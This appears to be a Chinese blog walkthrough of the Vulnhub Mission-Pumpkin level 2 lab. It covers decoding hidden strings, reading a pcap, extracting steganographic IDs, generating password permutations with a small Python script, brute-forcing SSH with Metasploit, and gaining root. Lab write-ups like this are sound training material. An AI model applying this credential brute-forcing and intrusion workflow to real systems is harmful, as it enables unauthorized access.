一段看上去像base64的密文,赶紧丢到解密工具解密,没有什么有用的信息:This is just to remaind you that it's Level 2 of Mission-Pumpkin! ;)
继续,一个url,转向pumpkin.html
又是一串注释掉的密文字符串,丢base64解不出,试试base32解。
解密为:/scripts/spy.pacp,访问一哈,下载下来一个tcp包文件,wireshark打开,随意点一个带有push字的包
发现明文传输,毫不犹豫追踪TCP流,发现ID:50609~lucky,不错哟
重点来了:别忘了上面pumpkin.html右边的滑块,拉到底发现被注释掉的十六进制的数组,用网站工具解密,找到Seeds ID: 96454(本人习惯比较差,不喜欢f12,所以这个点真的后知后觉才发现,小声bb)
终于功夫不负有心人,已经解出三个id,根据作者靶机下载页面的提示一共有四个id。总结一下,还有一张gif图片藏着一个id,解密出来再加上已经解密出的三个id,就大功告成了。(这么自信?)
既然Stegsolve试了不行咱们就换一个,使用stegosuite解密,试了一下需要密码,忽然想到之前hidden目录下奇怪的字符,赶紧复制下来一个一个试,还是不行,提示密码错误。难受~难道是图片错了?果然,在小弟的坚持不懈的努力下,发现了猫腻。猫腻不在于图片下的隐写,而在于哪张图片。。。最后隐写图片是那张jackolatantern.gif。(靶机作者已经被我吐槽一万遍)
提取文本,得到id:86568
就这样,一共找到四个seeds id: 69507 96454 50609 86568
接着小弟看着这个四个id,猜测用户名jack并且陷入了深深的沉思,到底是用msf跑呢,还是海德拉~没错小弟就是这么纠结- -(脚本是python的内建函数写的文尾附上)
最后还是用了最爱的msf跑出来密码(先用脚本组合四个id的不同组合即可),如图跑出来了。下一步ssh连吧。
ssh -l jack pass
继续行云流水,sudo su。不行?最后参考资料提到权限。省去exp提权~
总结下来,此次这个靶机的入侵过程虽然有些曲折,本菜也被误导到不少坑里~但是总体来说都不是很难,没有让我们来挖洞找页面漏洞来弹webshell,所以小弟认为比较适合一些有渗透基础的玩家~(对,就是我没错)。
https://www.360zhijia.com/anquan/413205.html 随机组合脚本:
#a,b,c,d代替即可,别忘了python严格的缩进~ import itertools for i in itertools.permutations([a,b,c,d],4): print(i)have fun!guys.why not do it yourself?
Subscribe to this blog via RSS.
Web 12
漏洞复现 12
渗透 10
Vulnhub 10
安全工具 6
笔记 41
软件移植 2
Arm 1
主动防御 2
技巧 3
排错 3
Waf 1
Maven 2
代码审计 2
Python 2
机器学习 1
Terminal 1
Docker 3
Cve 9
Bash 2
内网 1
信息搜集 8
Fuzz 1
Src 3
Vulnhub 2
Php 1
Web (12) 漏洞复现 (12) 渗透 (10) Vulnhub (10) 安全工具 (6) 笔记 (41) 软件移植 (2) Arm (1) 主动防御 (2) 技巧 (3) Android reverse (6) 排错 (3) Waf (1) Maven (2) 代码审计 (2) Python (2) 机器学习 (1) Terminal (1) Docker (3) Cve (9) Sql-inject (2) Bash (2) 内网 (1) 信息搜集 (8) Fuzz (1) Src (3) Vulnhub (2) Php (1)
